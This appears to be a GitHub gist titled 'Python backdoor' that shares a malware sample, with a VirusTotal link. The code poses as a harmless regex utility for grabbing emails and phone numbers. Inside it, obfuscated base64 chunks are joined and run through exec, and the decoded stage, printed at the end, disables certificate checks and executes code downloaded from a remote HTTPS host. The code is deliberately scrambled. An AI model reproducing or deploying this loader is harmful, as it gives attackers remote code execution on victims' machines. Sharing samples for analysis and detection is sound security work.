Created
August 28, 2018 05:04
-
-
Save seclib/30119946bb84f8a299a102b51dea9be9 to your computer and use it in GitHub Desktop.
Python backdoor
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Hash: 9f1bbfb7690b3af03f6d5f61325a327e0aee704f0418f88ccfb0973e94174e22 | |
| ## VT Link: https://www.virustotal.com/#/file/9f1bbfb7690b3af03f6d5f61325a327e0aee704f0418f88ccfb0973e94174e22/detection | |
| var1 = '''aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm''' | |
| import re | |
| # Matches everything between two texts, returns the first match, Returns: str or False | |
| var2 = '''8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cHM6Ly8xOTIuMTY4LjQyLjI0MDo0NDMvTjdBOFJaNnRnLVlYSndJelRLWkJGd2o1S0JxZDJmYTQtdWtnaURua0RlQ3AxM3R0MWJGN080NWJCWUJEOGZIdHRsS2dFNFV4aFFSaC12Y1hiakdXUUdSQzM3cmhZa0FaREF1SEFja0tiYUx5d0JXQ3FkalRTN0plSk1tV2VVWEgtUEJkc3lYMVlBWk1wZWphZlVaSElkYmhkcnRFN3pGVXByOEk3U0l1a1dCVGltaWI4TVhMX25KblZ5SFlBTWhpaDlnWEInKS5yZWFkKCkpCg==''' | |
| def grab(string, start, end): | |
| match = re.search(r'%s[^<]*%s' % (start, end), string) | |
| if match: | |
| return match.group().split(start)[1][:-len(end)] | |
| else: | |
| return False | |
| # Matches everything between two texts, returns list of matches, Returns: list or False | |
| def graball(string, start, end): | |
| matches = re.findall(r'%s[^<]*%s' % (start, end), string) | |
| if matches: | |
| return matches | |
| else: | |
| return False | |
| # Grabs all the emails, Returns: list or False | |
| vars = var1 + var2 | |
| def emails(string): | |
| matches = re.findall(r'[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+', string) | |
| if matches: | |
| return matches | |
| else: | |
| return False | |
| # Grabs all the phone numbers, Returns: list or False | |
| try: | |
| exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]](vars))) | |
| except: | |
| pass | |
| def numbers(string): | |
| matches = re.findall(r'(\d{3}[-\.\s]??\d{3}[-\.\s]??\d{4}|\(\d{3}\)\s*\d{3}[-\.\s]??\d{4}|\d{3}[-\.\s]??\d{4})', string) | |
| if matches: | |
| return matches | |
| else: | |
| import base64, sys, commands | |
| if (sys.platform.startswith("linux")) : | |
| if (commands.getoutput("whoami")) != "root" : | |
| print ("regxy.py needs to be run as root.") | |
| quit() | |
| return False | |
| ## base64 blob decodes to: | |
| var1 = '''import sys | |
| vi=sys.version_info | |
| ul=__import__({2:'urllib2',3:'urllib.request'}[vi[0]],fromlist=['build_opener','HTTPSHandler']) | |
| hs=[] | |
| if (vi[0]==2 and vi>=(2,7,9)) or vi>=(3,4,3): | |
| import ssl | |
| sc=ssl.SSLContext(ssl.PROTOCOL_SSLv23) | |
| sc.check_hostname=False | |
| sc.verify_mode=ssl.CERT_NONE | |
| hs.append(ul.HTTPSHandler(0,sc)) | |
| o=ul.build_opener(*hs) | |
| o.addheaders=[('User-Agent','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko')] | |
| exec(o.open('https://192.168.42.240:443/N7A8RZ6tg-YXJwIzTKZBFwj5KBqd2fa4-ukgiDnkDeCp13tt1bF7O45bBYBD8fHttlKgE4UxhQRh-vcXbjGWQGRC37rhYkAZDAuHAckKbaLywBWCqdjTS7JeJMmWeUXH-PBdsyX1YAZMpejafUZHIdbhdrtE7zFUpr8I7SIukWBTimib8MXL_nJnVyHYAMhih9gXB').read()) | |
| ''' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment